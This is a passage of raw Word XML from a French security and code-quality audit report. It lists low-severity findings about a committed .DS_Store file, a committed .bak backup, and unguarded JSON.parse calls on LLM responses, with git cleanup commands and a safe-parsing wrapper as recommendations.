      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le fichier .DS_Store généré par macOS est commité dans le repository. Ce fichier peut contenir des métadonnées sur l'arborescence de fichiers locaux du développeur, potentiellement révélant des noms de fichiers ou répertoires non versionnés sensibles. C'est aussi un signe que le .gitignore n'est pas appliqué rétroactivement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">.DS_Store présent à la racine du repository</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">git rm --cached .DS_Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># S'assurer que .gitignore contient bien .DS_Store (c'est déjà le cas)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Puis appliquer le .gitignore sur les fichiers déjà trackés :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">git rm -r --cached . &amp;&amp; git add .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-007  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier de backup .bak commité (intelligent-content-analyzer-optimized.js.bak)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Faible]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hygiène Git / Code mort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">intelligent-content-analyzer-optimized.js.bak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-563 — Unused Variable/Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Un fichier de sauvegarde .bak est commité dans le repository. Les fichiers de backup peuvent contenir du code obsolète avec des vulnérabilités corrigées entre-temps, des credentials d'ancienne configuration, ou du code expérimental. Ils augmentent la surface d'attaque et la confusion de maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">intelligent-content-analyzer-optimized.js.bak présent à la racine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">git rm intelligent-content-analyzer-optimized.js.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98C379"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ajouter au .gitignore :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*.bak</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">FV-008  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">JSON.parse sans try/catch sur les réponses LLM (multiples fichiers)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFCC44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  [Faible]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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Sévérité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Faible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Gestion des erreurs / Robustesse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fichier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">external-links-detector.js, contextual-widget-placer-v2.js, _OBSOLETE_semantic-link-analyzer.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Ligne(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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445566"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Références</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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2332"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-20 — Improper Input Validation, CWE-755 — Improper Handling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Plusieurs modules parsent directement les réponses JSON issues d'appels LLM sans encapsulation try/catch ou validation du schéma. Si le modèle retourne un JSON malformé (ce qui arrive régulièrement), cela provoque une exception non catchée pouvant interrompre le pipeline complet et exposer un stack trace dans les logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Preuve (extrait de code)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// external-links-detector.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const result = JSON.parse(response.choices[0].message.content);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">// contextual-widget-placer-v2.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const analysis = JSON.parse(response.choices[0].message.content);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommandation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Utiliser un wrapper sécurisé systématiquement :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">function safeParseLLMJson(raw) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  try {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Nettoyer les balises markdown potentielles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const clean = raw.replace(/```json|\s*```/g, '').trim();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return { data: JSON.parse(clean), error: null };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return { data: null, error: e.message };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="60" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A2332"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">const { data, error } = safeParseLLMJson(response.choices[0].message.content);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E2E" w:val="clear"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="C9D1D9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">if (error) { /* gérer l'erreur */ return fallbackBehavior(); }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"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2332" w:val="clear"/>
            <w:tcMar>
